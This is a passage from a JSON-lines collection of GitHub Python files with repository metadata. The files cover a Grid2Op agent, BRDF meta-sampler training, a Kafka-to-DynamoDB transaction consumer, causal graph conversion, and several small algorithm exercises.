code-block:: python\n \n import grid2op\n from grid2op.Agent import RecoPowerlinePerArea\n\n env_name = \"l2rpn_idf_2023\" # (or any other env name supporting the feature)\n env = grid2op.make(env_name)\n agent = RecoPowerlinePerArea(env.action_space, env._game_rules.legal_action.substations_id_by_area)\n \n\n \"\"\"\n def __init__(self, action_space: ActionSpace, areas_by_sub_id: dict):\n super().__init__(action_space)\n self.lines_to_area_id = np.zeros(type(action_space).n_line, dtype=int) - 1\n for aread_id, (area_nm, sub_this_area) in enumerate(areas_by_sub_id.items()):\n for line_id, subor_id in enumerate(type(action_space).line_or_to_subid):\n if subor_id in sub_this_area:\n self.lines_to_area_id[line_id] = aread_id\n if (self.lines_to_area_id == -1).any():\n raise AgentError(\"some powerline have no area id\")\n self.nb_area = len(areas_by_sub_id)\n \n def act(self, observation: BaseObservation, reward: float, done : bool=False):\n line_stat_s = observation.line_status\n cooldown = observation.time_before_cooldown_line\n can_be_reco = ~line_stat_s & (cooldown == 0)\n if not can_be_reco.any():\n # no line to reconnect\n return self.action_space()\n area_used = np.full(self.nb_area, fill_value=False, dtype=bool)\n reco_ids = []\n for l_id in np.where(can_be_reco)[0]:\n if not area_used[self.lines_to_area_id[l_id]]:\n reco_ids.append(l_id)\n area_used[self.lines_to_area_id[l_id]] = True\n res = self.action_space({\"set_line_status\": [(l_id, +1) for l_id in reco_ids]})\n return res\n","repo_name":"rte-france/Grid2Op","sub_path":"grid2op/Agent/recoPowerLinePerArea.py","file_name":"recoPowerLinePerArea.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":240,"dataset":"github-code","pt":"16"} +{"seq_id":"28883837435","text":"from datetime import datetime\nimport os\nimport copy\n\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\n\nimport torch\nfrom torch import optim\nfrom torch.utils.data import DataLoader\nimport learn2learn as l2l\nfrom ruamel.yaml import YAML\n\nimport datasets, sampler, nbrdf, utils\nfrom utils import freeze, unfreeze, split_merl\n\nimport argparse\n\n\ndef fast_adapt(learner, task, splr, shots, k, loss_fn):\n task_train, task_test = task\n\n invalid_samples = list()\n\n for step in range(k):\n rangles_adapt, mlp_input_adapt, groundTruth_adapt = sampler.sample_on_merl(\n task_train, splr, shots\n )\n valid_idx = torch.any(groundTruth_adapt != 0.0, dim=1)\n n_valid = valid_idx.sum() # the number of valid samples\n if n_valid != shots:\n invalid_samples.append(rangles_adapt[~valid_idx, :])\n # skip this step if there are not valid samples\n if n_valid == 0:\n continue\n rangles_adapt, mlp_input_adapt, groundTruth_adapt = (\n rangles_adapt[valid_idx, :],\n mlp_input_adapt[valid_idx, :],\n groundTruth_adapt[valid_idx, :],\n )\n output = learner(mlp_input_adapt)\n rgb_pred = nbrdf.brdf_to_rgb(rangles_adapt, output)\n rgb_gt = nbrdf.brdf_to_rgb(rangles_adapt, groundTruth_adapt)\n train_loss = loss_fn(y_true=rgb_gt, y_pred=rgb_pred)\n learner.adapt(train_loss)\n\n # compute eval_loss for valid samples\n rangles_eval, mlp_input_eval, groundTruth_eval = task_test.next()\n output = learner(mlp_input_eval)\n rgb_pred = nbrdf.brdf_to_rgb(rangles_eval, output)\n rgb_gt = nbrdf.brdf_to_rgb(rangles_eval, groundTruth_eval)\n eval_loss = loss_fn(y_true=rgb_gt, y_pred=rgb_pred)\n\n # compute rejection loss for invalid samples\n if len(invalid_samples) != 0:\n invalid_samples = torch.vstack(invalid_samples)\n loss_w = 1e-2 
# to balance 2 loss values\n rejection_loss = (\n loss_w\n * 0.5\n * (invalid_samples[:, 0] ** 2 + invalid_samples[:, 1] ** 2).sum()\n )\n else:\n rejection_loss = 0.0\n\n return eval_loss, rejection_loss\n\n\ndef evaluate(loader, model_GBML, splr, shots, k, loss_fn):\n freeze(splr)\n freeze(model_GBML, \"lrs\")\n\n meta_val_loss = 0.0\n meta_val_rej_loss = 0.0\n for tasks in loader:\n for _, task in enumerate(zip(*tasks)):\n learner = model_GBML.clone()\n\n eval_loss, rejection_loss = fast_adapt(\n learner, task, splr, shots, k, loss_fn\n )\n meta_val_loss += eval_loss.item()\n meta_val_rej_loss += (\n rejection_loss\n if isinstance(rejection_loss, float)\n else rejection_loss.item()\n )\n meta_val_loss /= len(loader.dataset)\n meta_val_rej_loss /= len(loader.dataset)\n\n unfreeze(splr)\n unfreeze(model_GBML, \"lrs\")\n\n return meta_val_loss, meta_val_rej_loss\n\n\ndef main(config):\n # general setup\n # ----------\n\n # FOR DEBUG\n # torch.autograd.set_detect_anomaly(True)\n\n # torch config & set random seed\n utils.seed_all(42)\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n torch.set_default_dtype(torch.float32)\n\n # hyperparameters\n shots = config.shots\n k = config.k\n n_det = config.n_det\n if n_det == -1:\n n_det = k * shots\n sampler_lr = config.sampler_lr\n fast_lr = config.fast_lr\n meta_bs = config.meta_bs\n n_epochs = config.n_epochs\n n_display_ep = config.n_disp_ep\n\n # config path\n exp_path = config.exp_path\n data_path = config.data_path\n model_path = config.model_path\n sampler_path = config.sampler_path\n\n # prepare datasets\n train_brdfs, test_brdfs = split_merl(data_path, split=0.8)\n # print(f\"datasets: {len(train_brdfs)} for training and {len(test_brdfs)} for testing\")\n\n taskset_train = datasets.MerlTaskset(train_brdfs, n_test_samples=25000)\n taskset_test = datasets.MerlTaskset(test_brdfs, n_test_samples=25000)\n\n taskloader_train = DataLoader(\n taskset_train, meta_bs, shuffle=True, collate_fn=datasets.custom_collate\n )\n\n taskloader_test = DataLoader(\n taskset_test, len(test_brdfs), collate_fn=datasets.custom_collate\n )\n\n # training setting\n # ----------\n if config.model == \"nbrdf\":\n model = nbrdf.MLP\n loss_fn = nbrdf.mean_absolute_logarithmic_error\n elif config.model == \"phong\":\n model = nbrdf.phong\n loss_fn = nbrdf.mean_absolute_logarithmic_error\n elif config.model == \"cooktorrance\":\n model = nbrdf.cook_torrance\n loss_fn = nbrdf.mean_absolute_logarithmic_error\n else:\n raise NotImplementedError(f\"{config.model} have not been implemented!\")\n\n model_GBML = l2l.algorithms.MetaSGD(model=model(), lr=fast_lr).to(device)\n\n # load the pretrained meta model\n pretrained_model = torch.load(\n os.path.join(model_path, f\"pretrained_{config.model}_20x512_10000ep.pth\"),\n map_location=device,\n )\n model_GBML.load_state_dict(pretrained_model)\n\n # prepare sampler\n splr = sampler.trainable_sampler_det(n_det, quasi_init=True).to(device)\n if n_det == 1:\n # 50 attempts to select the best initial positions\n best_attempt_loss = float(\"inf\")\n for _ in range(50):\n tmp_splr = sampler.trainable_sampler_det(n_det)\n tmp_splr.to(device)\n attempt_loss, _ = evaluate(\n taskloader_train, model_GBML, tmp_splr, shots, k, loss_fn\n )\n if attempt_loss < best_attempt_loss:\n best_attempt_loss = attempt_loss\n splr = tmp_splr\n else:\n trained_sampler_path = os.path.join(\n sampler_path, f\"meta_sampler_{config.model}_{n_det//2}.pth\"\n )\n if os.path.exists(trained_sampler_path):\n 
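# editor's note (added): warm-start from a meta-sampler previously trained with half as many directions (n_det // 2), when such a checkpoint exists\n            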
splr.load_samples(torch.load(trained_sampler_path, map_location=device))\n\n sampler_optimizer = optim.Adam(splr.parameters(), sampler_lr)\n sampler_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(\n sampler_optimizer, T_max=500, eta_min=sampler_lr / 5\n )\n\n # misc variables\n val_loss = \"N/A\" # for logging\n\n losses = list()\n rej_losses = list()\n\n val_losses = list()\n val_rej_losses = list()\n\n # record the reference loss and the initial states\n meta_val_loss, meta_val_rej_loss = evaluate(\n taskloader_test, model_GBML, splr, shots, k, loss_fn\n )\n val_loss = f\"{meta_val_loss:.5f}\"\n val_losses.append(meta_val_loss)\n val_rej_losses.append(meta_val_rej_loss)\n\n # save in the beginning\n if config.save:\n _now = datetime.now()\n _format = \"%Y_%m_%d_%H_%M_%S\"\n workspace = _now.strftime(_format)\n ws_path = os.path.join(exp_path, workspace)\n os.makedirs(ws_path, exist_ok=True)\n\n yaml = YAML()\n with open(os.path.join(ws_path, \"config.yaml\"), \"w\") as f:\n yaml.dump(vars(config), f)\n\n def make_checkpoint(counter):\n ckpt = dict()\n ckpt[\"sampler\"] = copy.deepcopy(splr.state_dict())\n ckpt[\"sampler_optimizer\"] = copy.deepcopy(sampler_optimizer.state_dict())\n ckpt[\"sampler_scheduler\"] = copy.deepcopy(sampler_scheduler.state_dict())\n torch.save(ckpt, os.path.join(ws_path, f\"ckpt_{counter:04d}.pth\"))\n\n ckpt_counter = 0\n if config.save:\n make_checkpoint(ckpt_counter)\n ckpt_counter += 1\n\n # for recording the best\n best_loss = float(\"inf\")\n\n # main loop\n # ----------\n with tqdm(total=n_epochs) as t:\n for ep in range(n_epochs):\n # logging info\n logs = {}\n\n meta_train_loss = 0.0\n meta_train_rej_loss = 0.0\n for tasks in taskloader_train:\n sampler_optimizer.zero_grad()\n total_loss = 0.0\n for _, task in enumerate(zip(*tasks)):\n learner = model_GBML.clone()\n\n eval_loss, rejection_loss = fast_adapt(\n learner, task, splr, shots, k, loss_fn\n )\n total_loss += eval_loss + rejection_loss\n meta_train_loss += eval_loss.item()\n meta_train_rej_loss += (\n rejection_loss\n if isinstance(rejection_loss, float)\n else rejection_loss.item()\n )\n\n total_loss = total_loss / taskloader_train.batch_size\n total_loss.backward()\n\n sampler_optimizer.step()\n\n sampler_scheduler.step()\n\n # logging\n meta_train_loss = meta_train_loss / len(taskloader_train.dataset)\n meta_train_rej_loss = meta_train_rej_loss / len(taskloader_train.dataset)\n losses.append(meta_train_loss)\n rej_losses.append(meta_train_rej_loss)\n\n # record the best\n if meta_train_loss < best_loss:\n best_loss = meta_train_loss\n # save the best splr over training\n if config.save:\n torch.save(\n copy.deepcopy(splr.state_dict()),\n os.path.join(\n ws_path, f\"meta_sampler_{config.model}_{n_det}.pth\"\n ),\n )\n torch.save(\n copy.deepcopy(splr.state_dict()),\n os.path.join(\n sampler_path, f\"meta_sampler_{config.model}_{n_det}.pth\"\n ),\n )\n\n # validate\n if (ep + 1) % n_display_ep == 0:\n meta_val_loss, meta_val_rej_loss = evaluate(\n taskloader_test, model_GBML, splr, shots, k, loss_fn\n )\n\n # logging\n val_loss = f\"{meta_val_loss:.5f}\"\n val_losses.append(meta_val_loss)\n val_rej_losses.append(meta_val_rej_loss)\n\n # record intermediate states\n if config.save:\n make_checkpoint(ckpt_counter)\n ckpt_counter += 1\n\n logs[\"val_loss\"] = val_loss\n logs[\"train_loss\"] = f\"{meta_train_loss:.5f}\"\n logs[\"best_loss\"] = f\"{best_loss:.5f}\"\n t.set_postfix(logs)\n t.update()\n\n if config.save:\n plt.figure(figsize=(10, 5))\n plt.plot(losses)\n 
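# editor's note (added): both the rendered curves (PDF) and the raw loss histories (via torch.save) are written to the run workspace below for later inspection\n        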
plt.savefig(os.path.join(ws_path, \"train_losses.pdf\"), bbox_inches=\"tight\")\n torch.save(losses, os.path.join(ws_path, \"train_losses.pth\"))\n\n plt.figure(figsize=(10, 5))\n plt.plot(rej_losses)\n plt.savefig(os.path.join(ws_path, \"train_rej_losses.pdf\"), bbox_inches=\"tight\")\n torch.save(rej_losses, os.path.join(ws_path, \"train_rej_losses.pth\"))\n\n plt.figure(figsize=(10, 5))\n plt.plot(val_losses)\n plt.savefig(os.path.join(ws_path, \"validate_losses.pdf\"), bbox_inches=\"tight\")\n torch.save(val_losses, os.path.join(ws_path, \"validate_losses.pth\"))\n\n plt.figure(figsize=(10, 5))\n plt.plot(val_rej_losses)\n plt.savefig(\n os.path.join(ws_path, \"validate_rej_losses.pdf\"), bbox_inches=\"tight\"\n )\n torch.save(val_rej_losses, os.path.join(ws_path, \"validate_rej_losses.pth\"))\n\n\nif __name__ == \"__main__\":\n # load command arguments\n # ----------\n\n parser = argparse.ArgumentParser(\n description=\"run meta-sampler experiment with specified configurations\"\n )\n parser.add_argument(\n \"--model\", type=str, default=\"nbrdf\", help=\"the name of model to be trained\"\n )\n parser.add_argument(\n \"--data_path\",\n type=str,\n default=\"/content/data/brdfs/\",\n help=\"the path containing brdf binaries\",\n )\n parser.add_argument(\n \"--model_path\",\n type=str,\n default=\"/content/data/meta-models/\",\n help=\"the path containing those pretrained meta models\",\n )\n parser.add_argument(\n \"--sampler_path\",\n type=str,\n default=\"/content/data/meta-samplers/\",\n help=\"the path containing those trained meta samplers\",\n )\n parser.add_argument(\n \"--shots\",\n type=int,\n default=1,\n help=\"the number of samples per step in the inner loop\",\n )\n parser.add_argument(\n \"--k\", type=int, default=1, help=\"the number of steps in the inner loop\"\n )\n parser.add_argument(\n \"--n_det\",\n type=int,\n default=-1,\n help=\"the number of trainable deterministic directions, deafulting to -1, which indicates k*shots\",\n )\n parser.add_argument(\n \"--meta_bs\", type=int, default=1, help=\"the batch size of outer loop\"\n )\n parser.add_argument(\n \"--fast_lr\", type=float, default=1e-3, help=\"the learning rate of inner loop\"\n )\n parser.add_argument(\n \"--sampler_lr\", type=float, default=1e-4, help=\"the learning rate of sampler\"\n )\n parser.add_argument(\n \"--n_epochs\", type=int, default=1000, help=\"the number of epochs\"\n )\n parser.add_argument(\n \"--n_disp_ep\",\n type=int,\n default=10,\n help=\"the number of epochs to validate the model\",\n )\n parser.add_argument(\n \"--save\",\n action=\"store_true\",\n help=\"if True, save the results into the workspace in the specified folder\",\n )\n parser.add_argument(\n \"--exp_path\",\n type=str,\n default=\"/content/drive/MyDrive/experiments/nbrdf-meta_sampler/\",\n help=\"the experiment folder\",\n )\n\n args = parser.parse_args()\n\n main(args)\n","repo_name":"ryushinn/meta-sampling","sub_path":"src/meta_sampler.py","file_name":"meta_sampler.py","file_ext":"py","file_size_in_byte":13699,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"16"} +{"seq_id":"4834088806","text":"import json\nimport base64\nfrom constants import *\nimport datetime\nimport boto3\nfrom kafka import KafkaConsumer\n\n\ndef append_transaction_details(data):\n \"\"\"\n append transaction details to dynamoDB\n \"\"\"\n dynamodb = boto3.resource('dynamodb', region_name='us-east-1')\n table = dynamodb.Table(DYNAMO_DB_NAME)\n print(\"data to append\", data)\n result = 
table.update_item(\n Key={'username': str(data['username'])},\n UpdateExpression=\"SET statements = list_append(if_not_exists(\"\n \"statements, :empty_list), :i)\",\n ExpressionAttributeValues={\n \":i\": [data],\n \":empty_list\": {\"statements\": []},\n },\n ReturnValues=\"UPDATED_NEW\"\n )\n\n\ndef lambda_handler(event, context):\n print(json.dumps(event))\n msgs = event['records'].values()\n for lst in msgs:\n for record in lst:\n print(record['value'], base64.b64decode(record['value']))\n information = json.loads(\n base64.standard_b64decode(record['value']).decode('utf-8'))\n append_transaction_details(information)\n print(\"finished\")\n # producer = KafkaProducer(bootstrap_servers=BOOTSTRAP_SERVERS)\n # print('publish approved transactions...')\n # for _ in range(10):\n # time = datetime.datetime.now().strftime('%m/%d/%Y %H:%M:%S')\n # producer.send(topic=\"Approved\", value=str.encode(time))\n # producer.flush()\n # print('finished')\n return {\n 'statusCode': 200,\n 'body': json.dumps('OK!')\n }\n\n\ndef main():\n consumer = KafkaConsumer(\n APPROVED_TOPIC_NAME,\n bootstrap_servers=BOOTSTRAP_SERVERS,\n group_id='status',\n auto_offset_reset='latest'\n )\n print('test consumer running')\n limit = 500 # consume at most 50 messages\n for idx, res in enumerate(consumer):\n if idx >= limit:\n break\n information = json.loads(res.value)\n print(information)\n append_transaction_details(information)\n consumer.commit()\n consumer.commit()\n\n\nif __name__ == '__main__':\n main()","repo_name":"linxiaow/AWS-MSK-Transaction-Fraud-Detection","sub_path":"kafka-final/test_consume_approve.py","file_name":"test_consume_approve.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44035098440","text":"from dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import List, Iterable\n\nfrom dependency_injector import containers\nfrom dependency_injector.wiring import inject\n\nfrom datagen.components.datapoint import DataPoint\n\nIDENTITIES_SCENE_FRAMES_RANGE = range(1)\n\n\n@inject\n@dataclass\nclass DatapointsRepository:\n datapoints_container: containers.DeclarativeContainer\n\n def get_datapoints(self, scene_path: Path, camera_name: str) -> List[DataPoint]:\n datapoints = []\n for frame_num in self._get_frames_range(scene_path):\n for environment in self._get_datapoints_environments(scene_path, camera_name, frame_num):\n datapoints.append(\n self.datapoints_container.factory(\n scene_path=scene_path,\n camera=camera_name,\n frame_num=frame_num,\n visible_spectrum_image_name=environment.image_name,\n )\n )\n return datapoints\n\n def _get_frames_range(self, scene_path: Path) -> range:\n if self._is_hic_scene(scene_path):\n return self._get_hic_scene_frames_range(scene_path)\n else:\n return IDENTITIES_SCENE_FRAMES_RANGE\n\n @staticmethod\n def _get_hic_scene_frames_range(scene_path: Path) -> range:\n frames_dirs = list(filter(lambda item: item.name.isnumeric(), scene_path.joinpath(\"frames\").iterdir()))\n frames_num = len(frames_dirs)\n return range(1, frames_num + 1)\n\n def _get_datapoints_environments(\n self, scene_path: Path, camera_name: str, frame_num: int\n ) -> Iterable[\"Environment\"]:\n return self.datapoints_container.modalities().read_textual_modality(\n modality_factory_name=\"environments\",\n modality_file_path=self._get_environments_modality_file_path(scene_path, camera_name, frame_num),\n )\n\n def _get_environments_modality_file_path(self, scene_path: Path, 
camera_name: str, frame_num: int) -> str:\n if self._is_hic_scene(scene_path):\n base_path = scene_path.joinpath(\"frames\", str(frame_num).zfill(3))\n else:\n base_path = scene_path\n return str(base_path.joinpath(camera_name, \"environment.json\"))\n\n @staticmethod\n def _is_hic_scene(scene_path: Path) -> bool:\n frames_path = scene_path.joinpath(\"frames\")\n return frames_path.exists() and frames_path.is_dir()\n","repo_name":"shayzi/datagen-sdk","sub_path":"components/datapoint/repo.py","file_name":"repo.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14188590616","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.right = None\n self.left = None\n\n def insert(self, data):\n if self.data:\n if data < self.data:\n if self.left is None:\n self.left = Node(data)\n else:\n self.left.insert(data)\n else:\n if self.right is None:\n self.right = Node(data)\n else:\n self.right.insert(data)\n else:\n self.data = data\n\n # Tree Traversal\n\n # Inorder Transversal\n def inorderTransversal(self, root, transversed_node=[]):\n if root == None:\n return\n root.inorderTransversal(root.left)\n transversed_node.append(root.data)\n root.inorderTransversal(root.right)\n return transversed_node\n\n\n # PostOrder Transversal\n def postorderTransversal(self, root, transversed_node=[]):\n if root == None:\n return\n root.postorderTransversal(root.left)\n root.postorderTransversal(root.right)\n transversed_node.append(root.data)\n return transversed_node\n\n # PreOrder Transversal\n def preorderTransversal(self, root, transversed_node = []):\n if root == None:\n return\n\n transversed_node.append(root.data)\n root.preorderTransversal(root.left)\n root.preorderTransversal(root.right)\n return transversed_node\n\n\n\n\n\n\nroot = Node(40)\nroot.insert(30)\nroot.insert(25)\nroot.insert(35)\nroot.insert(50)\nprint(root.left.left.data)\n\nprint('###### --- InOrder')\nprint(root.inorderTransversal(root))\n\nprint('###### --- PreOrder')\nprint(root.preorderTransversal(root))\n\nprint('###### --- Post')\nprint(root.postorderTransversal(root))\n","repo_name":"SirDamis/Data-Structures-Algorithms","sub_path":"Implementation/Trees/BinaryTree.py","file_name":"BinaryTree.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12482530835","text":"import networkx as nx\n\nimport pywhy_graphs\nimport pywhy_graphs.networkx as pywhy_nx\n\n\ndef graph_to_ananke(\n graph: pywhy_nx.MixedEdgeGraph,\n directed_edge_name=\"directed\",\n bidirected_edge_name=\"bidirected\",\n undirected_edge_name=\"undirected\",\n):\n \"\"\"\n Convert causal graph to Ananke graph. 
Supports graphs with directed, undirected, and\n bidirected edges -- including DAGs, ADMGs, and CGs (chain graphs).\n\n Parameters\n ----------\n graph : pywhy_nx.MixedEdgeGraph\n The mixed edge causal graph\n directed_edge_name : str\n Name of the directed edge, default is 'directed'.\n bidirected_edge_name : str\n Name of the bidirected edge, default is 'bidirected'.\n undirected_edge_name : str\n Name of the undirected edge, default is 'undirected'.\n Returns\n -------\n result : Graph\n The Ananke graph\n\n \"\"\"\n from ananke.graphs import ADMG, BG, CG, DAG, SG, UG\n\n vertices = graph.nodes\n has_directed = False\n has_bidirected = False\n has_undirected = False\n for edge_type, sub_graph in graph.get_graphs().items():\n if sub_graph.edges:\n if edge_type == directed_edge_name:\n has_directed = True\n di_edges = [e for e in sub_graph.edges]\n elif edge_type == bidirected_edge_name:\n has_bidirected = True\n bi_edges = [e for e in sub_graph.edges]\n elif edge_type == undirected_edge_name:\n has_undirected = True\n ud_edges = [e for e in sub_graph.edges]\n if has_directed and not has_bidirected and not has_undirected:\n result = DAG(vertices, di_edges)\n elif has_directed and has_bidirected and not has_undirected:\n result = ADMG(vertices, di_edges=di_edges, bi_edges=bi_edges)\n elif has_directed and not has_bidirected and has_undirected:\n result = CG(vertices, di_edges=di_edges, ud_edges=ud_edges)\n elif not has_directed and has_bidirected and not has_undirected:\n result = BG(vertices, bi_edges=bi_edges)\n elif not has_directed and not has_bidirected and has_undirected:\n result = UG(vertices, ud_edges=ud_edges)\n else:\n result = SG(vertices, di_edges=di_edges, bi_edges=bi_edges, ud_edges=ud_edges)\n\n return result\n\n\ndef ananke_to_graph(\n ananke_graph,\n directed_edge_name=\"directed\",\n bidirected_edge_name=\"bidirected\",\n undirected_edge_name=\"undirected\",\n) -> pywhy_nx.MixedEdgeGraph:\n \"\"\"\n Convert Ananke graph to causal graph. 
Explicitly supports conversion\n to pywhy_nx.DAG, pywhy_nx.ADMG, and for ananke.graphs.CG to pywhy_nx.CPDAG.\n Other graph types are converted to a pywhy_nx.MixedEdgeGraph.\n\n Parameters\n ----------\n ananke_graph : Graph\n The Ananke graph\n directed_edge_name : str\n Name of the directed edge, default is 'directed'.\n bidirected_edge_name : str\n Name of the bidirected edge, default is 'bidirected'.\n undirected_edge_name : str\n Name of the undirected edge, default is 'undirected'.\n Returns\n -------\n result : pywhy_nx.MixedEdgeGraph\n The mixed edge graph.\n \"\"\"\n from ananke.graphs import ADMG, CG, DAG\n\n if type(ananke_graph) == DAG:\n graph = pywhy_graphs.ADMG()\n graph.add_nodes_from(ananke_graph.vertices)\n graph.add_edges_from(ananke_graph.di_edges, edge_type=directed_edge_name)\n elif type(ananke_graph) == ADMG:\n graph = pywhy_graphs.ADMG()\n graph.add_nodes_from(ananke_graph.vertices)\n graph.add_edges_from(ananke_graph.di_edges, edge_type=directed_edge_name)\n graph.add_edges_from(ananke_graph.bi_edges, edge_type=bidirected_edge_name)\n elif type(ananke_graph) == CG:\n graph = pywhy_graphs.CPDAG()\n graph.add_nodes_from(ananke_graph.vertices)\n graph.add_edges_from(ananke_graph.di_edges, edge_type=directed_edge_name)\n graph.add_edges_from(ananke_graph.ud_edges, edge_type=undirected_edge_name)\n else:\n graph = pywhy_nx.MixedEdgeGraph()\n graph.add_nodes_from(ananke_graph.vertices)\n if ananke_graph.di_edges:\n directed_edges = nx.DiGraph(ananke_graph.di_edges)\n graph.add_edge_type(directed_edges, directed_edge_name)\n if ananke_graph.bi_edges:\n bidirected_edges = nx.Graph(ananke_graph.bi_edges)\n graph.add_edge_type(bidirected_edges, bidirected_edge_name)\n if ananke_graph.ud_edges:\n undirected_edges = nx.Graph(ananke_graph.ud_edges)\n graph.add_edge_type(undirected_edges, undirected_edge_name)\n\n return graph\n","repo_name":"py-why/pywhy-graphs","sub_path":"pywhy_graphs/export/ananke.py","file_name":"ananke.py","file_ext":"py","file_size_in_byte":4610,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"16"} +{"seq_id":"5571834762","text":"from typing import (\n List,\n)\n\nDIRECTION = [(0, 1), (0, -1), (1, 0), (-1, 0)]\n\n\nclass TrieNode:\n def __init__(self):\n self.children = {}\n self.is_word = False\n\n\nclass TrieTree:\n def __init__(self):\n self.root = TrieNode()\n\n def add(self, word):\n node = self.root\n\n for c in word:\n if c not in node.children:\n node.children[c] = TrieNode()\n\n node = node.children[c]\n node.is_word = True\n\n def find(self, word):\n node = self.root\n for c in word:\n node = node.children.get(c, None)\n if node is None:\n return None;\n\n return node\n\n\nclass Solution:\n\n def exist(self, board: List[List[str]], word: str) -> bool:\n\n tree = TrieTree()\n tree.add(word)\n\n n, m = len(board), len(board[0])\n\n for i in range(n):\n for j in range(m):\n c = board[i][j]\n if self.dfs(board, tree.root.children.get(c), i, j, set([(i, j)])):\n return True;\n\n return False;\n\n def dfs(self, board, node, x, y, visited):\n if node is None: return False;\n if node.is_word: return True;\n\n for dx, dy in DIRECTION:\n if not self.in_bound(board, x + dx, y + dy, visited): continue\n visited.add((x + dx, y + dy))\n if self.dfs(board, node.children.get(board[x + dx][y + dy]), x + dx, y + dy, visited):\n return True\n visited.remove((x + dx, y + dy))\n\n def in_bound(self, board, i, j, visited):\n if i < 0 or i > len(board) - 1: return False;\n if j < 0 or j > len(board[0]) - 1: return False;\n 
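# editor's note (added): a cell that is already on the current DFS path must not be revisited\n        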
if (i, j) in visited: return False\n\n return True\n\n\nboard = [\"ABCE\", \"SFCS\", \"ADEE\"]\nword = \"ABCCED\"\nret = Solution().exist(board, word)\n","repo_name":"jzhao62/lintcode_manuscript","sub_path":"lintcode/123/draft1.py","file_name":"draft1.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35264347877","text":"import numpy as np\r\nfrom keras.models import Sequential, load_model\r\nimport pandas as pd\r\nfrom keras.utils import np_utils\r\nimport evaluate_method\r\n\r\ndef eval_model(model, test_data_x, test_y_1D):\r\n y_pred_test = model.predict(test_data_x)\r\n probability = [prob[1] for prob in y_pred_test]\r\n print(len(probability))\r\n evaluate_method.get_ROC(test_y_1D, probability, save_path='roc_rnn_test.txt')\r\n acc = evaluate_method.get_acc(test_y_1D, probability) # AUC value\r\n auc = evaluate_method.get_auc(test_y_1D, probability) # ACC value\r\n kappa = evaluate_method.get_kappa(test_y_1D, probability)\r\n IOA = evaluate_method.get_IOA(test_y_1D, probability)\r\n mcc = evaluate_method.get_mcc(test_y_1D,probability)\r\n recall = evaluate_method.get_recall(test_y_1D, probability)\r\n precision = evaluate_method.get_precision(test_y_1D, probability)\r\n f1 = evaluate_method.get_f1(test_y_1D, probability)\r\n print(\"ACC = \" + str(acc)+\" AUC = \" + str(auc)+ ' kappa = '+ str(kappa) +\r\n ' IOA = ' + str(IOA) + ' MCC = ' + str(mcc))\r\n print(\"precision = \" + str(precision)+\" recall = \" + str(recall)+ ' f1 = '+ str(f1))\r\n # print(\"AUC = \" + str(auc))\r\n # print(kappa)\r\n\r\ndef readData(filePath):\r\n #训练数据的读入\r\n data = pd.read_csv(filePath)\r\n data = data.values\r\n data_x = data[:,:-1]\r\n data_x = np.expand_dims(data_x, axis=2)\r\n data_y_1D = data[:,-1]\r\n data_y = np_utils.to_categorical(data_y_1D, 2)\r\n return data_x, data_y, data_y_1D\r\ntrain_x, train_y, train_y_1D = readData('train_data_yongxin.csv')\r\ntest_x, test_y, test_y_1D = readData('test_data_yongxin.csv')\r\n#\r\n# test_x = train_x\r\n# test_y_1D = train_y_1D\r\n\r\nmodel_cnn = load_model('my_model_yongxin1.h5')\r\n# model_rnn = load_model('my_model_RNN1.h5')\r\n# model_rnn = load_model('my_model_yanshan_rnn.h5')\r\n# model_rnn_aug = load_model('my_model_yanshan_rnn_aug.h5')\r\n# print(str(model_cnn))\r\n\r\n\r\n# 评估模型\r\n# eval_model(model_cnn, test_data_x, test_y_1D)\r\n# eval_model(model_cnn_aug, test_data_x, test_y_1D)\r\n# eval_model(model_rnn, test_data_x_rnn, test_y_1D)\r\neval_model(model_cnn, test_x, test_y_1D)","repo_name":"xmblb/CNN_FE","sub_path":"CNN_ouput.py","file_name":"CNN_ouput.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"74664688007","text":"\"\"\"\r\n\"\"\"\r\nfrom collections import Counter\r\n\r\n\r\ndef numJewelsInStones(J, S):\r\n \"\"\"\r\n \"\"\"\r\n counts = Counter(S)\r\n intersection = set(J) & set(counts.keys())\r\n return sum(counts[jewel] for jewel in intersection)\r\n\r\n\r\ndef alt(J, S):\r\n \"\"\"\r\n fastest\r\n \"\"\"\r\n counts = 0\r\n set_J = set(J)\r\n for stone in S:\r\n if stone in set_J:\r\n counts += 1\r\n return counts\r\n\r\n\r\ndef altalt(J, S):\r\n \"\"\"\r\n \"\"\"\r\n counts = Counter(S)\r\n total = 0\r\n for jewel in J:\r\n try:\r\n total += counts[jewel]\r\n except KeyError:\r\n continue\r\n\r\n return 
